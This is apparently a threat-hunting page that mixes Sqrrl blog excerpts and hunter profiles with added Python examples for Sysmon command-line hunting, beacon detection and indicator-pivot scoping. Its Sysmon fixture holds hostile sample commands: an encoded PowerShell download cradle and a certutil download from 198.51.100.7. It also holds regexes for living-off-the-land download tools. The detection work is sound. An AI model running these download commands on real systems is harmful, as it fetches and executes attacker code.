You’ve probably heard this a million times by now: “You need a hunt team.” This is true, as far as it goes, but why? For most people, the initial answer is probably something close to “So we can find bad guys on our network.” Again, this is true, but would it surprise you to learn that finding the bad guys is probably the least important reason to have a hunt team?
PowerShell transcripts, Sysmon, Firewall & Host logs
Preferred Hunting Techniques: Anomaly Detection & Offensive Countermeasures
Carbon Black Response, Security Onion, ADHD & Kibana
Processes are executed on systems in a variety of ways. A process might be executed by a user double-clicking an icon, by an automated service running at startup, or by a script referencing a third-party application. While not every attack requires the use of malware, most of them do require the execution of some type of process, even if it is a legitimate process being used for nefarious purposes. In this post, I’ll discuss how hunting for command line process executions can be a useful strategy for finding evil and how Sqrrl can make finding and investigating these events easier.
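As an added illustration of the approach described above (example code written for this page, not Sqrrl’s product logic or the author’s own code), here is a small hunt over constructed Sysmon Event ID 1 records. It combines three command-line checks that a practitioner would run first: an Office application spawning a shell, an encoded PowerShell command that is decoded and inspected for a download cradle, and living-off-the-land download syntax. It also stacks parent/child pairs across hosts so that one-off combinations surface as lower-confidence leads. The host names, file paths, the 198.51.100.7 address and the rule thresholds are all assumptions.

```python
"""Hunt over Sysmon Event ID 1 (process creation) records for suspicious
command lines.  Added example: the records below are constructed, not
telemetry from any real host, and the rules are illustrative."""
import base64
import re
from collections import defaultdict

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Living-off-the-land download syntax as it appears in command lines.
LOLBIN_DOWNLOAD = [
    re.compile(r"certutil(\.exe)?\s.*-urlcache", re.I),
    re.compile(r"bitsadmin(\.exe)?\s.*/transfer", re.I),
    re.compile(r"mshta(\.exe)?\s+https?://", re.I),
    re.compile(r"regsvr32(\.exe)?\s.*/i:https?://", re.I),
]
# Download-cradle keywords looked for inside a decoded PowerShell command.
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|IEX|Invoke-Expression", re.I)
# -e / -ec / -enc / -EncodedCommand followed by the base64 blob (longest alias first).
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmd):
    """Return the UTF-16LE plaintext behind -EncodedCommand, or None if absent/invalid."""
    m = ENC_FLAG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt(events):
    """Return one finding per event that trips at least one rule, in event order."""
    # Stacking baseline: on how many distinct hosts has each parent->child pair been seen?
    pair_hosts = defaultdict(set)
    for e in events:
        pair_hosts[(basename(e["parent"]), basename(e["image"]))].add(e["host"])
    findings = []
    for e in events:
        parent, image, cmd = basename(e["parent"]), basename(e["image"]), e["cmd"]
        reasons = []
        if parent in OFFICE and image in SHELLS:
            reasons.append(f"office app {parent} spawned {image}")
        decoded = decode_encoded_command(cmd) if image == "powershell.exe" else None
        if decoded is not None:
            reasons.append("encoded PowerShell command line")
            if CRADLE.search(decoded):
                reasons.append("download cradle in decoded command")
        if any(p.search(cmd) for p in LOLBIN_DOWNLOAD):
            reasons.append(f"LOLBin download via {image}")
        if len(pair_hosts[(parent, image)]) == 1:  # low confidence on its own
            reasons.append(f"rare pair {parent}->{image} (seen on 1 host)")
        if reasons:
            findings.append({"host": e["host"], "image": image, "cmd": cmd,
                             "reasons": reasons, "decoded": decoded})
    return findings


def encode_ps(script):
    """Build an -EncodedCommand blob the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def ev(host, parent, image, cmd):
    return {"host": host, "parent": parent, "image": image, "cmd": cmd}


SVC, SVCHOST = r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe"
EXPLORER, CMD = r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"

# Constructed sample events (assumed hosts and paths), not real telemetry.
EVENTS = [
    ev("ws01", SVC, SVCHOST, "svchost.exe -k netsvcs"),
    ev("ws02", SVC, SVCHOST, "svchost.exe -k netsvcs"),
    ev("ws03", SVC, SVCHOST, "svchost.exe -k netsvcs"),
    ev("ws01", EXPLORER, CMD, "cmd.exe /c dir"),
    ev("ws02", EXPLORER, CMD, 'cmd.exe /c "ipconfig /all"'),
    ev("ws01", WINWORD, PS, "powershell.exe -nop -w hidden -enc " + encode_ps(
        "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')")),
    ev("ws03", CMD, r"C:\Windows\System32\certutil.exe",
       r"certutil.exe -urlcache -split -f http://198.51.100.7/x.exe C:\Users\Public\x.exe"),
    ev("ws02", EXPLORER, PS, r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"),
]

if __name__ == "__main__":
    for f in hunt(EVENTS):
        print(f["host"], f["image"], "|", "; ".join(f["reasons"]))
```

The rarity rule is deliberately last and weakest: in a real fleet the long tail of parent/child pairs is mostly admin scripts and installers, so treat it as a pivot into the process’s hash, signer and PowerShell transcript rather than as a finding by itself.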
As defenders, the critical moment is when we’ve determined that an attacker’s attempt to gain a foothold on the network was successful. This sets off a chain of investigative activity in which we follow breadcrumbs through our data to understand where the attacker went, what their mission is, and what they took. As these breadcrumbs are uncovered, we don’t just follow their path; we also must determine whether similar evidence can be found at other points on the network. This is all part of scoping the attacker’s activity to better understand the attack. In this post, I’m going to talk about strategies for attack scoping and discuss how Sqrrl enables them intuitively.
- Contextual data is important, but a lot of success can be gained by gathering relatively simple forms of data. For example, flow data can be analyzed with tools like FlowBAT and SiLK, alongside Bro logs, to create a comprehensive picture of your network that is very conducive to hunting.
- SOCs should take steps to avoid information siloing, especially when deployment groups within an organization are geographically separated.
- Hunting can be challenging, but is by no means impossible. A lot of good work can be done by getting set up with simple tools and expanding from there. In other words, “Find weirdness in all that data and you’ll learn a lot.”
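One concrete way to “find weirdness” in the simple data these points recommend is to hunt for beaconing in flow records. The following is an added example written for this page (not FlowBAT, SiLK or Sqrrl code): it parses pipe-delimited flow lines laid out like `rwcut` output with `stime|sip|dip|dport|bytes` fields (an assumed layout), groups them by source, destination and port, and flags pairs whose inter-flow intervals and byte counts are both suspiciously regular. The addresses, timestamps and thresholds are constructed.

```python
"""Beacon hunting over flow records.  Added example: the flows below are
constructed in the shape of pipe-delimited rwcut output (an assumed layout,
not real SiLK data), and the thresholds are illustrative."""
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

FMT = "%Y/%m/%dT%H:%M:%S.%f"


def parse_flow(line):
    """'sTime|sIP|dIP|dPort|bytes' -> (datetime, sip, dip, dport, bytes)."""
    stime, sip, dip, dport, nbytes = line.strip().split("|")
    return datetime.strptime(stime, FMT), sip, dip, int(dport), int(nbytes)


def find_beacons(flows, min_flows=8, max_interval_cv=0.15, max_size_cv=0.25):
    """Flag (sip, dip, dport) tuples whose timing and size are too regular.

    The coefficient of variation (stdev / mean) is used so that a 60 s beacon
    with a few seconds of jitter and a 10 min beacon are judged on the same
    scale.  Low CV on both axes is the signature of automated check-ins."""
    by_pair = defaultdict(list)
    for t, sip, dip, dport, nbytes in flows:
        by_pair[(sip, dip, dport)].append((t, nbytes))
    hits = []
    for pair, recs in by_pair.items():
        if len(recs) < min_flows:
            continue
        recs.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(recs, recs[1:])]
        sizes = [n for _, n in recs]
        mean_gap = statistics.mean(gaps)
        if mean_gap <= 0:
            continue
        gap_cv = statistics.pstdev(gaps) / mean_gap
        size_cv = statistics.pstdev(sizes) / statistics.mean(sizes)
        if gap_cv <= max_interval_cv and size_cv <= max_size_cv:
            hits.append({"pair": pair, "flows": len(recs), "period_s": round(mean_gap, 1),
                         "interval_cv": round(gap_cv, 3), "size_cv": round(size_cv, 3)})
    return hits


def constructed_flow_lines():
    """Constructed sample: one jittered 60 s beacon, one bursty browsing session,
    one short-lived pair.  Addresses are documentation ranges, not real hosts."""
    base = datetime(2017, 3, 1, 9, 0, 0)

    def line(offset, sip, dip, dport, nbytes):
        stamp = (base + timedelta(seconds=offset)).strftime(FMT)[:-3]  # ms like rwcut
        return f"{stamp}|{sip}|{dip}|{dport}|{nbytes}"

    lines = []
    jitter = [0, 1, -2, 2, 0, -1, 1, 0, -1, 2, 0, 1]
    for i, j in enumerate(jitter):  # 10.0.0.5 checks in every ~60 s, ~1 KB each
        lines.append(line(60 * i + j, "10.0.0.5", "203.0.113.9", 443, 1024 + 16 * (i % 3)))
    browsing = [(0, 12000), (7, 300000), (9, 8000), (120, 45000), (131, 2500),
                (600, 90000), (603, 1200), (1900, 60000), (1904, 7000), (3600, 15000)]
    for off, nbytes in browsing:  # irregular, human-driven traffic
        lines.append(line(off, "10.0.0.7", "198.51.100.20", 443, nbytes))
    for off in (30, 31, 95):  # too few flows to judge
        lines.append(line(off, "10.0.0.9", "198.51.100.20", 443, 4000))
    return lines


if __name__ == "__main__":
    flows = [parse_flow(l) for l in constructed_flow_lines()]
    for hit in find_beacons(flows):
        print(hit)
```

Regular timing is a lead, not a verdict: NTP, update checkers and monitoring agents beacon too, so the next step is to pivot on the destination (passive DNS, whois, who else talks to it) before calling it command and control.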
An incident investigation will only go as far as the evidence allows it. Of course, there are many components that have to come together to make that happen. The network must support the collection of robust and diverse evidence sources, and that evidence must be searchable by the analyst. From there, the incident investigation hinges on the ability of the analyst to ask questions, successfully traverse evidence to answer those questions, and draw conclusions from the findings.
Alan Orlikoski has over 15 years of experience in both the private and public sectors of the IT industry. He has designed and implemented defense solutions for government and Fortune 100 companies. He has more recently participated on teams tasked to assess and advise Fortune 100 clients, with a focus on maturing an organization’s ability to more quickly and effectively detect, respond to, and contain targeted attacks.
Malware Repositories, Passive DNS, Domain Whois
Preferred Hunting Techniques: Link Analysis, malware analysis, link exploration
VirusTotal, PassiveTotal, DomainTools, internal collection tools
Investigations are all about iterating through evidence that helps you make decisions about what events transpired on your network. That sounds easy enough, but asking the right questions and identifying the data you need to answer them is tricky. This problem manifests in two ways. First, not having enough of the right data means you may be unable to answer the questions that will move the investigation forward. Conversely, having too much data may be overwhelming with a tremendous number of fields and complementary evidence sources to examine. In either case, asking good questions and moving towards a conclusion quickly and accurately depends on knowing what data is available to you in any given scenario. In this post, I’ll address these concerns and discuss how Sqrrl helps you better understand your data so that you know where the gaps are and what options you have available to you within the context of an active investigation.
Finding evil is all about asking the right questions, finding answers, and using those answers to ask more questions. Each question and answer represents a decision point, branching the investigation off down a new path. The path of the analyst is far from linear, and sometimes we need to go back and retrace our steps to work from a previous decision point. Just like Hansel and Gretel left breadcrumbs along their path through the woods, we too need breadcrumbs to ensure that we’re fully exploring our hypotheses and seeing the whole picture of an investigation clearly.
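The three ideas above, scoping the attacker across the network from a single foothold, knowing which data sources actually cover a host before drawing a conclusion, and keeping the breadcrumb trail that led to each decision point, can be shown together in one pivot routine. This is an added example written for this page, not Sqrrl’s link-analysis engine or the author’s code. It starts from one seed indicator, pulls every record that contains it, extracts further indicators from those records, and repeats, recording for each host reached the chain of indicators that got there. It also reports which sources are missing for each host, so a host that shows up only in flow data is not mistaken for one that was checked against the file hash. The hosts, the hash, the `update.evil.example` domain, the IP addresses and the coverage sets are all constructed, and the "sysmon" rows assume Event ID 1 and Event ID 3 were already joined on ProcessGuid so a hash and a destination IP appear on one record.

```python
"""Scope an intrusion by pivoting from one seed indicator through several
evidence sources, keeping the breadcrumb trail for every host reached and
flagging hosts whose missing telemetry makes a finding unverifiable.
Added example: records, hosts, hashes, domains and IPs are constructed."""
from collections import defaultdict, deque

# Which record field carries which indicator type.  Filenames are left out
# on purpose: pivoting on a name like "x.exe" alone drags in unrelated hosts.
FIELD_TYPES = {"sha256": "hash", "query": "domain", "answer": "ip", "dip": "ip"}

BAD_HASH = "3b1d" + "0" * 60  # constructed placeholder, not a real sample hash

# Constructed evidence.  The "sysmon" rows stand for EID 1 + EID 3 already
# joined on ProcessGuid (assumption), so a hash and destination IP sit together.
RECORDS = [
    {"_src": "sysmon", "host": "ws01", "sha256": BAD_HASH, "dip": "203.0.113.9"},
    {"_src": "sysmon", "host": "ws03", "sha256": BAD_HASH, "dip": "203.0.113.9"},
    {"_src": "dns", "host": "ws01", "query": "update.evil.example", "answer": "203.0.113.9"},
    {"_src": "flow", "host": "ws07", "dip": "203.0.113.9"},
    {"_src": "dns", "host": "ws04", "query": "update.evil.example", "answer": "203.0.113.10"},
    {"_src": "flow", "host": "ws06", "dip": "203.0.113.10"},
    {"_src": "dns", "host": "ws02", "query": "www.example.com", "answer": "93.184.216.34"},
    {"_src": "sysmon", "host": "ws05", "sha256": "ffff" + "0" * 60, "dip": "10.0.0.1"},
]
FLEET = {f"ws{n:02d}" for n in range(1, 8)}
# Hosts that actually ship each source (constructed).  No hit on a host that
# is outside a set is a gap in the data, not a clean bill of health.
COVERAGE = {
    "sysmon": {"ws01", "ws02", "ws03", "ws05"},
    "dns": {"ws01", "ws02", "ws04"},
    "flow": FLEET,
}


def indicators(rec):
    """All pivotable (type, value) pairs on one record."""
    return {(t, rec[f]) for f, t in FIELD_TYPES.items() if f in rec}


def scope(records, seed, fleet, coverage):
    """Breadth-first pivot from `seed` through records that share an indicator.

    Returns the hosts reached (with the source and indicator of each hit and
    the sources they do not report), the trail to every indicator found, and
    the unreached hosts on which at least one source could not be checked."""
    index = defaultdict(list)
    for i, rec in enumerate(records):
        for ind in indicators(rec):
            index[ind].append(i)
    trail = {seed: [seed]}       # indicator -> chain of indicators that led to it
    seen_rec = set()
    hosts = defaultdict(list)
    queue = deque([seed])
    while queue:
        ind = queue.popleft()
        for i in index[ind]:
            if i in seen_rec:
                continue
            seen_rec.add(i)
            rec = records[i]
            hosts[rec["host"]].append({"source": rec["_src"], "via": ind, "trail": trail[ind]})
            for new in indicators(rec):
                if new not in trail:           # first time we see it: record the breadcrumb
                    trail[new] = trail[ind] + [new]
                    queue.append(new)
    report = {}
    for h in sorted(hosts):
        missing = sorted(src for src, covered in coverage.items() if h not in covered)
        report[h] = {"hits": hosts[h], "missing_sources": missing}
    unreached = sorted(fleet - set(hosts))
    gaps = {h: sorted(s for s, c in coverage.items() if h not in c) for h in unreached}
    return {"hosts": report, "trail": trail, "unverified": {h: g for h, g in gaps.items() if g}}


if __name__ == "__main__":
    result = scope(RECORDS, ("hash", BAD_HASH), FLEET, COVERAGE)
    for host, info in result["hosts"].items():
        print(host, "reached via", [h["via"] for h in info["hits"]],
              "missing:", info["missing_sources"])
    print("not reached but not fully checked:", result["unverified"])
```

Two design choices matter here. First, each record is visited once, so a shared infrastructure node such as a CDN address cannot send the pivot into a loop, but it can still pull in far too much; the `FIELD_TYPES` whitelist is where an analyst decides which artifact types are strong enough to pivot on. Second, `unverified` is the list to hand to whoever deploys sensors: those hosts are outside the scope only because nobody could look, which is the opposite of having been cleared.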